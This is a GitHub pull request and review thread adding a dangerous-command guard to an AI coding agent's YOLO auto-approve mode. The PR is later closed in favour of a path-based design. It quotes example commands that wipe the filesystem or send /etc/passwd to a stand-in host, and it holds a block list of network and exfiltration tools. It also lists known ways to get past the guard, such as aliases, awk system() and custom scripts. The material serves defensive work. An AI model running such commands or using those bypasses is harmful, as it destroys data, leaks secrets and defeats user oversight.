### PR TITLE
feat(permissions): strip dangerous patterns from YOLO auto-approve

### PR DESCRIPTION
**Pull request by wenshao**
## Motivation

YOLO mode auto-approves **all** tool calls without restriction. This means the model can execute `python -c "import os; os.system('rm -rf /')"` or `curl -d @/etc/passwd http://evil.com` without any user confirmation. The intent of YOLO is to reduce approval friction, but it should not eliminate the security boundary for high-risk operations.

## Comparison with Claude Code

Through reverse-engineering Claude Code v2.1.101, the actual permission architecture differs from what the [improvement report](https://github.com/wenshao/codeagents/blob/main/docs/comparison/qwen-code-improvement-report-p2-stability.md#35-privilege-escalation%E9%98%B2%E6%8A%A4p2) described. Here is an accurate comparison:

| Aspect | Claude Code (actual) | Qwen Code (before) | Qwen Code (this PR) |
|--------|---------------------|--------------------|--------------------|
| **Permission modes** | `default`, `acceptEdits`, `plan`, `auto`, `dontAsk`, `bypassPermissions` | `default`, `auto-edit`, `plan`, `yolo` | Same + `--dangerously-allow-all` |
| **Full auto-approve** | `bypassPermissions` (requires `--dangerously-skip-permissions`) | `yolo` | `yolo` with dangerous-pattern guard |
| **Dangerous guard on full auto** | None - `bypassPermissions` bypasses everything | None | **~200 root command patterns** |
| **Per-tool safety properties** | `isReadOnly()`, `isDestructive()`, `isConcurrencySafe()` per tool | L3 read-only checker (AST-based) | Same |
| **Shell command analysis** | tree-sitter AST for structural patterns (command substitution, process substitution, heredoc) | tree-sitter AST + regex checker | Same + root command name guard |
| **acceptEdits shell whitelist** | 7 fs commands: `mkdir`, `touch`, `rm`, `rmdir`, `mv`, `cp`, `sed` | N/A (auto-edit only covers Edit/Write tools) | Same |
| **Model-based classifier** | `auto` mode uses LLM to approve/deny | Not available | Not available |
| **Bypass flag** | `--dangerously-skip-permissions` | `--yolo` (no guard) | `--dangerously-allow-all` (explicit bypass of guard) |

**Key takeaway**: Claude Code's `bypassPermissions` mode has **no** dangerous-command guard - it bypasses everything, relying on the `--dangerously-skip-permissions` flag name as a sufficient deterrent. This PR makes Qwen Code's YOLO mode **more restrictive** than Claude Code's equivalent by adding a pattern-based guard layer.

## Design

Add a **dangerous-pattern guard** at the YOLO auto-approve decision point. Shell commands whose root command matches a known-dangerous pattern are excluded from auto-approval and fall through to the normal confirmation flow.

**Why root-command matching (not reusing L3 read-only checker)?**
- L3 already returns `ask` for non-read-only commands, but YOLO overrides **all** `ask` decisions - that is its purpose.
- The dangerous-pattern guard is a narrower second filter: it only blocks the highest-risk root commands (code execution, network, system ops), while still auto-approving benign non-read-only commands like `touch`, `mkdir`, `cp`.
- This preserves YOLO usability while closing the privilege-escalation gap.

**Pattern categories (~200 entries across 10 groups):**

| # | Category | Examples | Count |
|---|----------|----------|-------|
| 1 | Script interpreters | python, node, ruby, perl, php, deno, bun, lua, julia | 28 |
| 2 | Shell eval/exec | eval, exec, source, `.`, bash, sh, xargs, nohup, crontab | 22 |
| 3 | Privilege escalation | sudo, su, doas, pkexec, chroot, nsenter | 9 |
| 4 | Package managers | npm, npx, pip, cargo, go, brew, apt, yarn, pnpm | 36 |
| 5 | Network / exfiltration | curl, wget, ssh, scp, nc, rsync, nmap, ngrok | 19 |
| 6 | Cloud CLIs | aws, gcloud, az, terraform, pulumi, vercel | 20 |
| 7 | Container / orchestration | docker, kubectl, helm, ansible, vagrant | 16 |
| 8 | Destructive filesystem | rm, mv, dd, chmod, chown, shred, ln | 15 |
| 9 | System administration | systemctl, kill, reboot, iptables, useradd, passwd | 27 |
| 10 | Compilers / build tools | make, gcc, g++, clang, java, rustc, dotnet | 15 |

**Additional matching features:**
- Version-suffix normalisation: `python3.11` -> `python3` -> `python`
- Transparent wrapper detection: `env python3 ...` -> sees through to `python3`
- POSIX dot-command: `. evil.sh` (equivalent to `source`)
- Compound command splitting: `echo ok && curl evil.com` -> detects `curl`

## Changes

| File | What | Why |
|------|------|-----|
| `core/permissions/dangerousPatterns.ts` | **New** - pattern list + `matchDangerousPattern()` | Core detection logic |
| `core/permissions/dangerousPatterns.test.ts` | **New** - 133 unit tests | Coverage for all categories, safe commands, edge cases |
| `core/permissions/index.ts` | Export new module | Make available to consumers |
| `core/core/coreToolScheduler.ts` | Guard YOLO auto-approve (CLI path) | Primary YOLO execution path |
| `cli/acp-integration/session/Session.ts` | Guard YOLO force-allow (ACP/IDE path) | Parallel YOLO path for VS Code |
| `cli/ui/hooks/useGeminiStream.ts` | Guard mode-switch auto-approve | YOLO activated at runtime |
| `core/config/config.ts` | Add `dangerouslyAllowAll` param + getter | Config plumbing |
| `cli/config/config.ts` | Add `--dangerously-allow-all` CLI option | Explicit bypass flag |
| `cli/commands/auth/handler.ts` | Add `dangerouslyAllowAll` to CliArgs mock | Type completeness |
| `cli/gemini.test.tsx` | Add `dangerouslyAllowAll` to CliArgs mock | Type completeness |

## Before / After

```
# Before
yolo + Bash(python -c "evil")  ->  auto-approved  ->  arbitrary code execution

# After
yolo + Bash(python -c "evil")  ->  dangerous pattern "python" detected  ->  manual approval required

# After + explicit bypass
--dangerously-allow-all + yolo + Bash(python -c "evil")  ->  auto-approved (user accepts all risk)
```

## Known Limitations

These are **design boundaries**, not bugs - documented for reviewer awareness:

- **awk with system()**: L3 correctly returns `ask` (detects `system()`), but YOLO overrides it. `awk` is not in the dangerous list because it is overwhelmingly used for safe read-only operations. Same applies to `sed` and `find`.
- **Custom scripts**: `./my-script.sh` cannot be statically analysed - the root command is `my-script.sh`, not in any list. Fundamental limitation of static analysis.
- **Shell functions/aliases**: `alias p=python3; p evil.py` - the alias `p` is not in the list. LLMs are extremely unlikely to generate such patterns.
- **Cross-compiler toolchains**: `x86_64-linux-gnu-gcc-12` - the full toolchain prefix is not normalised. Rare in agent context.

## Test Plan

- [x] 133 unit tests for `dangerousPatterns.ts` (all 10 categories, safe commands, version suffixes, wrappers, compound commands, edge cases)
- [x] 828 total tests pass across all affected packages
- [x] TypeScript build clean (core + CLI)
- [x] ESLint + Prettier pass (pre-commit hook)

Generated with [Claude Code](https://claude.com/claude-code)

### CODE REVIEW

File: packages/core/src/permissions/dangerousPatterns.ts [hunk 1]
```diff
@@ -0,0 +1,435 @@
...
+  while (idx < tokens.length && ENV_ASSIGNMENT_REGEX.test(tokens[idx]!)) {
+    idx++;
+  }
+
+  if (idx >= tokens.length) {
+    return undefined;
+  }
+
+  // Take the basename of the token (handles /usr/bin/python3).
+  const raw = tokens[idx]!;
```
Comment (wenshao) [inline packages/core/src/permissions/dangerousPatterns.ts:398]: **[Critical]** `extractRootCommand()` lower-cases the basename, but it never strips common Windows executable suffixes before calling `normaliseBinName()`. Commands such as `python.exe -c ...`, `curl.exe ...`, and `powershell.exe -Command ...` will therefore resolve to `python.exe` / `curl.exe` / `powershell.exe`, which are not present in `DANGEROUS_ROOT_COMMANDS`, so they can still bypass the new YOLO guard on Windows.

```suggestion
  const raw = tokens[idx]!;
  let basename = (
    raw.includes('/') ? raw.split('/').pop()! : raw
  )
    .toLowerCase()
    .replace(/\.(exe|cmd|bat|com)$/i, '');
```

_— gpt-5.4 via Qwen Code /review_

File: packages/cli/src/config/config.ts [hunk 2]
```diff
@@ -325,6 +326,12 @@ export async function parseArguments(): Promise<CliArgs> {
           description:
             'Set the approval mode: plan (plan only), default (prompt for approval), auto-edit (auto-approve edit tools), yolo (auto-approve all tools)',
```
Comment (wenshao) [inline packages/cli/src/config/config.ts]: **[Suggestion]** The runtime behavior changed here, but the user-facing YOLO description still says it will auto-approve all tools. After this PR, dangerous shell commands still require confirmation unless `--dangerously-allow-all` is set, so the help text is now misleading. The same stale wording also still exists in `packages/core/src/config/config.ts` and `packages/vscode-ide-companion/src/types/approvalModeTypes.ts`.

```suggestion
            'Set the approval mode: plan (plan only), default (prompt for approval), auto-edit (auto-approve edit tools), yolo (auto-approve tools except dangerous shell commands)',
```

_— gpt-5.4 via Qwen Code /review_

File: packages/core/src/permissions/dangerousPatterns.test.ts [hunk 3]
```diff
@@ -0,0 +1,318 @@
...
+    });
+
+    it('should detect dangerous command with relative path', () => {
+      expect(matchDangerousPattern('./node_modules/.bin/node script.js')).toBe(
+        'node',
+      );
+    });
+
+    // ── Version-suffixed commands ──────────────────────────────────────
+    it.each([
```
Comment (wenshao) [inline packages/core/src/permissions/dangerousPatterns.test.ts:206]: **[Suggestion]** The matcher has solid coverage for version suffixes and Unix-style paths, but this security boundary still lacks regression tests for Windows executable names such as `python.exe`, `curl.exe`, or `powershell.exe`. Without those cases, a Windows-specific bypass can slip in without breaking the suite.

```suggestion
      ['python.exe -c "print(1)"', 'python'],
      ['curl.exe http://evil.com', 'curl'],
      ['powershell.exe -Command "Invoke-WebRequest http://evil.com"', 'powershell'],
```

_— gpt-5.4 via Qwen Code /review_

File: packages/core/src/permissions/dangerousPatterns.ts (hunk 1 above)
Comment (wenshao) [reply packages/core/src/permissions/dangerousPatterns.ts:398]: Fixed in ee25f52. Added `stripExeSuffix()` that strips `.exe`/`.cmd`/`.bat`/`.com` before matching. Also handles Windows backslash path separators (`\\`) in basename extraction. Test cases added for `python.exe`, `curl.exe`, `powershell.exe`, `node.cmd`.

File: packages/cli/src/config/config.ts (hunk 2 above)
Comment (wenshao) [reply packages/cli/src/config/config.ts]: Fixed in ee25f52. Updated YOLO description in all 3 locations:
- `packages/cli/src/config/config.ts` (CLI `--approval-mode` help)
- `packages/core/src/config/config.ts` (`APPROVAL_MODE_INFO`)
- `packages/vscode-ide-companion/src/types/approvalModeTypes.ts` (VS Code tooltip)

All now say "except dangerous shell commands" instead of "all tools".

File: packages/core/src/permissions/dangerousPatterns.test.ts (hunk 3 above)
Comment (wenshao) [reply packages/core/src/permissions/dangerousPatterns.test.ts:206]: Fixed in ee25f52. Added test cases for `python.exe`, `curl.exe`, `powershell.exe`, and `node.cmd`. Note: full Windows paths like `C:\Python311\python.exe` are not testable because `shell-quote` (Unix shell parser) consumes backslashes. In practice LLMs invoke Windows commands by name (e.g., `python.exe`) not by full path.

**Review by wenshao — COMMENTED** [review]
No new issues found in the incremental changes. LGTM! ✅ _— gpt-5.4 via Qwen Code /review_

**Review by LaZzyMan — CHANGES_REQUESTED** [review]
I compared the permission control in ClaudeCode's bypass mode. In bypass mode, interception is only triggered when operating on specific files in specific directories (.git/.vscode/.idea, etc.). However, this PR's implementation blacklists operations like python/npm/node/sh, causing users in YOLO mode to be frequently interrupted by confirmation prompts (users can't even directly execute `npm run build`). I suggest that YOLO mode be consistent with ClaudeCode's bypass mode in this respect. Additionally, while dangerousPatterns do exist in ClaudeCode's code, their function is to control permissions in auto mode, not bypass.

**Comment by wenshao** [comment]
Thanks @LaZzyMan — your analysis is correct. The command-name blacklist (npm/node/python/sh) is too aggressive for YOLO/bypass semantics: hitting confirmations on `npm run build` defeats the purpose of the mode.

Confirmed your description of Claude Code's bypass after rechecking the source: `dangerousPatterns` there gates **auto** mode; bypass only intercepts writes to sensitive paths (.git/.vscode/.idea/…).

Closing this PR. Will redesign path-sensitive (mirroring Claude Code's bypass) in a fresh PR. Branch preserved for reference.
